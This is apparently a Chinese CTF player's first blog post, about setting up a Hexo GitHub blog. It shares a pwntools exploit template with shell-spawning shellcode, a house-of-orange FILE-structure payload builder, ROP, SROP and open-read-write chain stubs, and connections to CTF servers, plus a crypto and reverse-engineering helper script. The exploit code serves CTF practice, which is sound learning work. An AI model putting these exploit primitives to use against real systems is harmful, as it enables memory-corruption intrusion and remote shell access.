感悟 January 03, 2020

第一篇github博客

Words count 58k Reading time 52 mins. Read count 0

搭建之路

第一次搭建自己的个人github博客,前前后后用了大概有2天的时间吧,

下载软件+建立库+修改主题+主题配置+文章的攥写

最头疼的是各种玄学问题的出现,让人很无语,找了各种资料去解决,收获了很多知识,也学到了很多东西,实践出真知,多实践真的很好!

配置推荐

关于博客的搭建,网上有一大把教程,这里就不多说了,这里分享一个大佬的基本主题配置,很受用:https://www.jianshu.com/p/3a05351a37dc

代码测试

pwn代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
# -*- coding: utf-8 -*-
from pwn import *
#from LibcSearcher import *
from libformatstr import FormatStr
context.log_level = 'debug'
context.terminal=['tmux','splitw','-h']
context(arch='amd64', os='linux')
context(arch='i386', os='linux')
local = 1
elf = ELF('./pwn1')
if local:
p = process('./pwn1')
libc = elf.libc
else:
p = remote('116.85.48.105',5005)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


#obj = LibcSearcher("fgets", 0x7ff39014bd90) # 使用一个已知符号地址作为初始约束,初始化 LibcSearcher
#obj.add_condition("atoi", 218528) # 添加一个约束条件
#obj.dump("printf") # 根据已有约束条件,查询某个符号在 Libc 中的地址

#onegadget64(libc.so.6)
#one_gadget -l 200 /lib/x86_64-linux-gnu/libc.so.6
# one23 = [0x45226,0x4527a,0xf03a4,0xf1247]
# one27 = [0x4f2c5,0x4f322,0x10a38c]
# one29 = [0xe237f,0xe2383,0xe2386,0x106ef8]
# one31 = [0xe6ce3,0xe6ce6,0xe6ce9]
#onegadget32(libc.so.6)
# one32 = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6]

# fmt_payload
# py32 = fmtstr_py(start_read_offset,{xxx_got:system_addr})
# sl(py32)
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.py(start_read_offset))

# shellcode = asm(shellcraft.sh())
shellcode32 = '\x68\x01\x01\x01\x01\x81\x34\x24\x2e\x72\x69\x01\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x6a\x0b\x58\xcd\x80'
shellcode64 = '\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
#shellcode64 = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
def pack_file(_flags = 0,
_IO_read_ptr = 0,
_IO_read_end = 0,
_IO_read_base = 0,
_IO_write_base = 0,
_IO_write_ptr = 0,
_IO_write_end = 0,
_IO_buf_base = 0,
_IO_buf_end = 0,
_IO_save_base = 0,
_IO_backup_base = 0,
_IO_save_end = 0,
_IO_marker = 0,
_IO_chain = 0,
_fileno = 0,
_lock = 0,
_wide_data = 0,
_mode = 0):
file_struct = p32(_flags) + \
p32(0) + \
p64(_IO_read_ptr) + \
p64(_IO_read_end) + \
p64(_IO_read_base) + \
p64(_IO_write_base) + \
p64(_IO_write_ptr) + \
p64(_IO_write_end) + \
p64(_IO_buf_base) + \
p64(_IO_buf_end) + \
p64(_IO_save_base) + \
p64(_IO_backup_base) + \
p64(_IO_save_end) + \
p64(_IO_marker) + \
p64(_IO_chain) + \
p32(_fileno)
file_struct = file_struct.ljust(0x88, "\x00")
file_struct += p64(_lock)
file_struct = file_struct.ljust(0xa0, "\x00")
file_struct += p64(_wide_data)
file_struct = file_struct.ljust(0xc0, '\x00')
file_struct += p64(_mode)
file_struct = file_struct.ljust(0xd8, "\x00")
return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
py = pack_file(_flags = 0,
_IO_read_ptr = 0x61, #smallbin4file_size
_IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
_IO_write_base = 0,
_IO_write_ptr = 1,
_IO_buf_base = binsh_addr,
_mode = 0,
)
py += p64(_IO_str_jumps_addr-8) # vtable
py += p64(0) # paddding
py += p64(system_addr)
return py

def get_io_str_jumps_offset(libc):
IO_file_jumps_offset = libc.sym['_IO_file_jumps']
IO_str_underflow_offset = libc.sym['_IO_str_underflow']
for ref_offset in libc.search(p64(IO_str_underflow_offset)):
possible_IO_str_jumps_offset = ref_offset - 0x20
if possible_IO_str_jumps_offset > IO_file_jumps_offset:
# print possible_IO_str_jumps_offset
return possible_IO_str_jumps_offset

def house_of_orange_py(libc, libc_base):
io_str_jump = libc_base + get_io_str_jumps_offset(libc)
io_list_all = libc_base + libc.symbols['_IO_list_all']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search('/bin/sh'))
py = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
return py

sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()


def debug(mallocr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
gdb.attach(p,'b *{}'.format(hex(text_base+mallocr)))
else:
gdb.attach(p,"b *{}".format(hex(mallocr)))

# with open('1.txt','wb+') as f:
# s = ""
# for i in shellcode:
# s += "0x" + i.encode("hex")
# for i in s:
# f.write(i)

# def mid_overflow(offset,func_got,rdi,rsi,rdx,next_func):
# py = ''
# py += 'a'*offset
# py += 'a'*8
# py += p64(pppppp_ret)
# py += p64(0)
# py += p64(0)
# py += p64(1)
# py += p64(func_got)
# py += p64(rdx)
# py += p64(rsi)
# py += p64(rdi)
# py += p64(mov_ret)
# py += p64(0)
# py += p64(0)
# py += p64(0)
# py += p64(0)
# py += p64(0)
# py += p64(0)
# py += p64(0)
# py += p64(next_func)
# return py


def add(size,content):
ru("> ")
sl('1')
ru()
sl(str(size))
ru()
sd(content)
def free(index):
ru("> ")
sl('3')
ru()
sl(str(index))
def edit(index,content):
ru("> ")
sl('2')
ru()
sl(str(index))
ru()
sd(content)
def show(index):
ru("> ")
sl('4')
ru()
sl(str(index))




#libc_base = u64(rc(6).ljust(8,'\x00'))
#print "libc_base--->" + hex(libc_base)
#malloc_hook = libc_base + libc.sym["__malloc_hook"]
#fake_chunk = malloc_hook - 0x23
#onegadget = libc_base + one64[2]
#realloc = libc_base + libc.sym["realloc"]
#free_hook = libc_base + libc.sym["__free_hook"]
#system = libc_base + libc.sym["system"]
#binsh = libc_base + libc.search("/bin/sh").next()
#setcontext = libc_base + libc.sym["setcontext"]
#magic_gadget = libc_base + 0x00000000001547a0
#pop_rdi_ret = 0x0000000000400ea3
#pop_rdx_rsi_ret = libc_base + 0x0000000000115189
#syscall = libc_base + 0x00000000000bc3f5
#pop_rax_ret = libc_base + 0x000000000003a738
#leave_ret = libc_base + 0x0000000000400b8c

#frame = SigreturnFrame()#read(0,free_hook,0x1000) syscall
#frame.rdi = 0
#frame.rsi = bss#rdi+0x70
#frame.rdx = 0x1000#rdi+0x50
#frame.rsp = bss#ret
#frame.rip = syscall_ret#rsp->rip
#a = len(str(frame))
#print "length--->" + hex(a)
#edit(0,str(frame))


# def srop_pay():
# pay = ''
# pay += p64(0) + p64(pay_start)
# pay = pay.ljust(0x20,'\x00')
# pay += p64(setcontext+33)
# pay = pay.ljust(0x68,'\x00')
# pay += p64(0)
# pay += p64(pay_start)
# pay += p64(0)
# pay += p64(0)
# pay += p64(0x110)
# pay = pay.ljust(0xa0,'\x00')
# pay += p64(pay_start)
# pay += p64(syscall_ret)
# pay = pay.ljust(0xe0,'\x00')
# pay += p64(pay_start)
# return pay

# def orw_pay(flag_addr,addr):
# py = ''
# py += p64(pop_rdi_ret)
# py += p64(flag_addr)
# py += p64(pop_rdx_rsi_ret)
# py += p64(0)
# py += p64(0)
# py += p64(pop_rax_ret)
# py += p64(2)
# py += p64(syscall)
# py += p64(pop_rdi_ret)
# py += p64(3)
# py += p64(pop_rdx_rsi_ret)
# py += p64(0x80)
# py += p64(addr)
# py += p64(pop_rax_ret)
# py += p64(0)
# py += p64(syscall)
# py += p64(pop_rdi_ret)
# py += p64(1)
# py += p64(pop_rax_ret)
# py += p64(1)
# py += p64(syscall)
# py += "./flag\x00\x00"
# return py



# i = 0
# while 1:
# print i
# i += 1
# try:
# pwn()
# except EOFError:
# p.close()
# local = 1
# elf = ELF('./note_five')
# if local:
# p = process('./note_five')
# libc = elf.libc
# continue
# else:
# p = remote('121.40.246.48',9999)
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# else:
# sl("ls")
# break
p.interactive()

re代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
# -*- coding: utf-8 -*-
from Crypto.Cipher import ARC4,AES,DES
from Crypto.Util.Padding import unpad
from binascii import *
import base64
import re
import hashlib
from z3 import *
from gmpy2 import *
import libnum
from Crypto.Util.number import *
import xxtea
import sm4

# #sm4
# cipher=[0xEA,0x63,0x58,0xB7,0x8C,0xE2,0xA1,0xE9,0xC5,0x29,0x8F,0x53,0xE8,0x8,0x32,0x59,0xAF,0x1B,0x67,0xAE,0xD9,0xDA,0xCF,0xC4,0x72,0xFF,0xB1,0xEC,0x76,0x73,0xF3,0x6]
# cipher1=bytes(cipher[:16])
# cipher2=bytes(cipher[16:])
# print(len(cipher2))
# key1=sm4.SM4Key(b'Ez_5M4_C1pH@r!!!')
# print(key1.decrypt(cipher1)+key1.decrypt(cipher2))


# table1 = [
# 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',
# 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
# 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
# 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/','=']
# table2 = [0x37, 0x34, 0x35, 0x32, 0x33, 0x30, 0x31, 0x3E, 0x3F, 0x3C, 0x3D, 0x3A, 0x3B, 0x38, 0x39, 0x26, 0x27, 0x24, 0x25, 0x22, 0x23, 0x20, 0x21, 0x2E, 0x2F, 0x2C, 0x17, 0x14, 0x15, 0x12, 0x13, 0x10, 0x11, 0x1E, 0x1F, 0x1C, 0x1D, 0x1A, 0x1B, 0x18, 0x19, 0x06, 0x07, 0x04, 0x05, 0x02, 0x03, 0x00, 0x01, 0x0E, 0x0F, 0x0C, 0x46, 0x47, 0x44, 0x45, 0x42, 0x43, 0x40, 0x41, 0x4E, 0x4F, 0x5D,0x59]

# def rc4_decrypt(cipher, key):
# rc4 = ARC4.new(key)
# return rc4.decrypt(cipher)
# def rc4_encrypt(cipher, key):
# rc4 = ARC4.new(key)
# return rc4.encrypt(cipher)
# def aes_decrypt_ECB(cipher, key):
# aes = AES.new(key, AES.MODE_ECB)
# return aes.decrypt(cipher)
# def aes_decrypt_CBC(cipher, key, IV):
# aes = AES.new(key, IV = IV,mode=AES.MODE_CBC)
# return aes.decrypt(cipher)
# def aes_encrypt_ECB(cipher, key):
# aes = AES.new(key, AES.MODE_ECB)
# return aes.encrypt(cipher)
# def aes_encrypt_CBC(cipher, key, IV):
# aes = AES.new(key, IV = IV,mode=AES.MODE_CBC)
# return aes.encrypt(cipher)
# def des_decrypt_ECB(cipher, key):
# des = DES.new(key, DES.MODE_ECB)
# return des.decrypt(cipher)
# def des_encrypt_ECB(cipher, key):
# des = DES.new(key, DES.MODE_ECB)
# return des.encrypt(cipher)
# def des_encrypt_CBC(cipher, key,IV):
# des = DES.new(key, IV=IV, mode=DES.MODE_CBC)
# return des.encrypt(cipher)
# def des_decrypt_CBC(cipher, key,IV):
# des = DES.new(key, IV=IV, mode=DES.MODE_CBC)
# return des.decrypt(cipher)

# #AES DES RC4
# key = b"De1CTF"
# rc4_key = key
# des_key = key.ljust(8, b"\x00")
# des_IV = b"\x01\x02\x03\x04\x05\x06\x07\x08"
# aes_key = key.ljust(16, b"\x00")
# aes_IV = b"\x01\x02\x03\x04\x05\x06\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"

# minwen = b"flag{1234567890}"

# print(rc4_encrypt(minwen,rc4_key).hex())
# cipher = "9fc730a2fa6d55afa5e2835a383e70ee"
# cipher = bytes.fromhex(cipher)
# print(rc4_decrypt(cipher,key))

# print(aes_encrypt_CBC(minwen,aes_key,aes_IV).hex())
# cipher1 = "44d39494cfc13982a4e131677d8ca5a3"
# cipher1 = bytes.fromhex(cipher1)
# print(aes_decrypt_CBC(cipher1,aes_key,aes_IV))

# print(aes_encrypt_ECB(minwen,aes_key).hex())
# cipher2 = "8cb1a49f4c7616b412a3a47318d8a32f"
# cipher2 = bytes.fromhex(cipher2)
# print(aes_decrypt_ECB(cipher2,aes_key))

# print(des_encrypt_ECB(minwen,des_key).hex())
# cipher3 = "4464cd4a107144a7f2b5ca8b6dda926b"
# cipher3 = bytes.fromhex(cipher3)
# print(des_decrypt_ECB(cipher3,des_key))

# print(des_encrypt_CBC(minwen,des_key,des_IV).hex())
# cipher4 = "3dbaf9c38dc5807595f23b8d7bcac28e"
# cipher4 = bytes.fromhex(cipher4)
# print(des_decrypt_CBC(cipher4,des_key,des_IV))



# # Base64
# c = [4, 19, 0, 19, 4, 5, 19, 93]
# code =''
# for i in c:
# code += table1[table2.index(i)]
# print(base64.b64decode(code).hex())

# bb = b"\x78\x6f\x66"
# print(bb.hex())
# a = 'aabbccddeeff'
# a_bytes = bytes.fromhex(a)
# print(a_bytes)

# # Z3
# def change1(x):
# for i in range(1,len(x)):
# for j in range(0,i//3,1):
# x[i] ^= x[j]
# return x
# f = [BitVec("x%d"%i, 8) for i in range(24)]
# fc = [BitVec("x%d"%i, 8) for i in range(24)]
# ft = change1(f)
# dt = [0xCE, 0xBC, 0x40, 0x6B, 0x7C, 0x3A, 0x95, 0xC0, 0xEF, 0x9B, 0x20, 0x20, 0x91, 0xF7, 0x02, 0x35, 0x23, 0x18, 0x02, 0xC8, 0xE7, 0x56, 0x56, 0xFA]
# s = Solver()
# for i in range(24):
# s.add(ft[i] == dt[i])
# s.check()
# m = s.model()
# ans = []
# for i in range(24):
# ans.append(m[fc[i]].as_long())
# print(ans)

# # RSA
# n = 3161262255255421133292506694323988711204792818702640666084331634444148712428915950639954540974469931426618702044672318134908678730641981414037034058320359158246813987154679178159391832232990193738454116371045928434239936027006539348488316754611586659587677659791620481200732564068367148541242426533823626586574915275209508300120574819113851895932912208783915652764568319771482309338434364094681579135086703127977870534715039005822312878739611630155714313119545610939253355808742646891815442758660278514976431521933763272615653261044607041876212998883732724662410197038419721773290601109065965674129599626151139566369
# e = 65537
# c = 631583911592660652215412683088688785438938386403323323131247534561958531288570612134139288090533619548876156447498627938626419617968918299212863936839701943643735437264304062828205809984533592547599060829451668240569384130130080928292082888526567902695707215660020201392640388518379063244487204881439591813398495285025704285781072987024698133147354238702861803146548057736756003294248791827782280722670457157385205787259979804892966529536902959813675537028879407802365439024711942091123058305460856676910458268097798532901040050506906141547909766093323197363034959926900440420805768716029052885452560625308314284406
# p = 56225103425920179745019828423382255030086226600783237398582720244250840205090747144995470046432814267877822949968612053620215667790366338413979256357713975498764498045710766375614107934719809398451422359883451257033337168560937824719275885709824193760523306327217910106187213556299122895037021898556005848447
# q = 56225103425920179745019828423382255030086226600783237398582720244250840205090747144995470046432814267877822949968612053620215667790366338413979256357713975498764498045710766375614107934719809398451422359883451257033337168560937824719275885709824193760523306327217910106187213556299122895037021898556005848927
# d = invert(e,(p-1)*(q-1))
# m = pow(c,d,n)
# print(long_to_bytes(m))

# # SHA256\MD5
# m = b"12345"
# c = hashlib.sha256(m).hexdigest()
# print(c)
# c = hashlib.md5(m).hexdigest()
# print(c)

# # XXTEA
# text = b"1234567890123456"
# key = b"12345670"
# key = key.ljust(16,b"\x00")
# enc = b'\x90%\xc5X\x11\x07\xf9{u]\xdf\xe5\x84\xa6eV\xeb\x10f\x83'
# decrypt_data = xxtea.decrypt(enc, key)
# print(decrypt_data)

# # 正则匹配
# s = "1234abcd"
# p = re.compile('[0-9]')
# c = p.findall(s)
# d = re.sub("[^0-9]+","",s)
# print(c,d)

大家可以自行去搭建,后期继续更新博客,主要写CTF的writeup和自己的生活感想,最后放张我喜欢的鸣人,哈哈,大家一起学习一起加油!

自娱自乐

简书已经停止更新,以后都在这里写个人博客了,向各位大佬们学习,努力提升自己的实力。

基本操作:

1
2
3
4
hexo clean
hexo g
hexo s #static
hexo d #dynamic

这里记录下hexo d时签名的写入:

1
2
ssh-agent -s
ssh-add ~/.ssh/id_rsa
0%